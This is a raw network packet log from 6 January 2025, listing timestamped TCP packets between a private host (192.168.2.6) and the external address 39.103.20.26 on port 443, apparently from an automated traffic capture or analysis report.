Jan 6, 2025 04:50:45.701550007 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.701555014 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.701564074 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.701591015 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.707108021 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.707171917 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.707200050 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.707243919 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.712779045 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.712852001 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.712863922 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.712919950 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.718760014 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.718822956 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.718956947 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.719007015 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.721376896 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.721417904 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.721434116 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.721488953 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.724754095 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.724802017 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.724812031 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.724817038 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.724843979 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.724858999 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.728050947 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.728099108 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.728142023 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.728192091 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.732765913 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.732816935 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.943329096 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.943381071 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.982320070 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.982332945 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.982392073 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068121910 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068129063 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068137884 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068192005 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068196058 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068239927 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068243027 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068267107 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068269968 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068278074 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068311930 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068315983 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068347931 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068351030 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068387985 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068391085 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068423033 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068425894 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068444014 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068455935 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068459988 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068496943 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068506002 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068512917 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068531990 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068536043 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068572044 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068577051 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068609953 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068617105 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068644047 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068646908 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068653107 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068681955 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068685055 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068722963 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068727016 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068763018 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068766117 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068804026 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068837881 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.068849087 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.068897009 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.279335022 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.279526949 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:46.719335079 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:46.721824884 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224311113 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224325895 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224337101 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224416971 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224416971 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224425077 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224435091 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224443913 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224482059 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224487066 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224535942 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224540949 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224596977 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224600077 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224651098 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224653959 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224694014 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224699020 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224708080 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224721909 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224757910 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224761963 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224778891 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224782944 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224812984 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224818945 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224864960 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224869013 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224879980 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224905014 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224910975 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224910975 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224915028 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.224989891 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.224989891 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.384401083 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.384414911 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.384471893 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.407749891 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.407762051 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.407783031 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.407789946 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.407963991 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.407970905 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.407984018 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.407995939 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.408046007 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.408051014 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.408149958 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.408154964 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.408178091 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.408183098 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.408256054 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.597731113 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.597749949 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.597819090 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.624830008 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.624844074 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.624860048 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.624862909 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.625042915 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.625050068 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.625062943 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.625078917 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.625085115 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.625088930 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.625147104 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.625154018 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.625235081 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.625289917 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.625296116 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.625345945 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.828445911 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.828458071 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.828479052 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.828491926 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.828628063 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.828634024 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.828643084 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.828659058 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.828665018 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.828670025 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.828730106 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.828735113 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.828819036 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.828824997 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:47.828859091 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:47.828883886 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.035335064 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.035882950 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.068447113 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.068459034 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.068469048 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.068552017 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.068557024 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.068567038 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.068639040 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.068643093 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.068650961 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.068674088 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.068703890 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.142914057 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.142925978 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.142940044 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.142946005 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.143163919 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.143170118 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.143182993 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.143187046 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.143271923 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.143275976 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.143388987 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.143399954 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.143477917 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.351334095 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.351381063 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.363524914 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.363532066 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.363543034 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.363552094 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.363647938 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.363656044 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.363707066 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.443331957 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.443345070 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.443360090 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.443367004 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.443511009 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.443517923 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.443535089 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.443547010 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.443562031 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.443566084 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.443644047 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.443654060 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.443696976 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.443737030 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.655328035 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.655436993 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.705259085 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.705286980 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.705301046 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.705311060 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.705441952 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.705449104 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.705503941 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.784284115 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.784298897 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.784316063 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.784324884 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.784563065 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.784569979 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.784580946 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.784595013 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.784600973 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.784655094 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.784743071 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.784748077 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.784837008 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:48.995328903 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:48.995381117 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.092464924 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.092478037 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.092494965 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.092503071 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.092593908 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.092600107 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.092647076 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.191447020 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.191490889 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.191543102 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.191574097 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.191662073 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.191684008 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.191705942 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.191770077 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.191771030 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.191787958 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.191817999 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.191863060 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.191900015 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.191934109 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.399328947 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.399386883 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.479285002 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.479300976 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.479320049 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.479446888 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.614610910 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.614629030 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:49.614723921 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.943067074 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:49.995784044 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:50.575052977 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:50.575083971 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:50.762929916 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:50.762983084 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:50.763108015 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:50.763335943 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:50.763346910 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.072372913 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.072482109 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.073071003 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.073081017 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.073303938 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.073311090 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.404304981 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.404333115 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.404459000 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.404474974 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.404546976 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.404640913 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.404700041 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.405473948 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.405513048 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.405540943 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.405549049 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.405565977 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.405986071 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.495801926 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.495846987 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.495872974 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.495883942 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.495902061 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.495929003 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.496311903 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.496371031 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.496376991 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.496417999 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.496428967 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.496475935 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.496531010 CET	49988	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.496546984 CET	443	49988	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.512059927 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.512108088 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:52.512206078 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.512489080 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:52.512502909 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:53.717607975 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:53.717672110 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:53.718235016 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:53.718244076 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:53.718630075 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:53.718633890 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:54.037029982 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:54.037054062 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:54.037117004 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:54.037137985 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:54.037151098 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:54.037184000 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:54.037511110 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:54.037568092 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:54.037573099 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:54.037612915 CET	49989	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:54.037619114 CET	443	49989	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:54.037662983 CET	49989	443	192.168.2.6	39.103.20.26
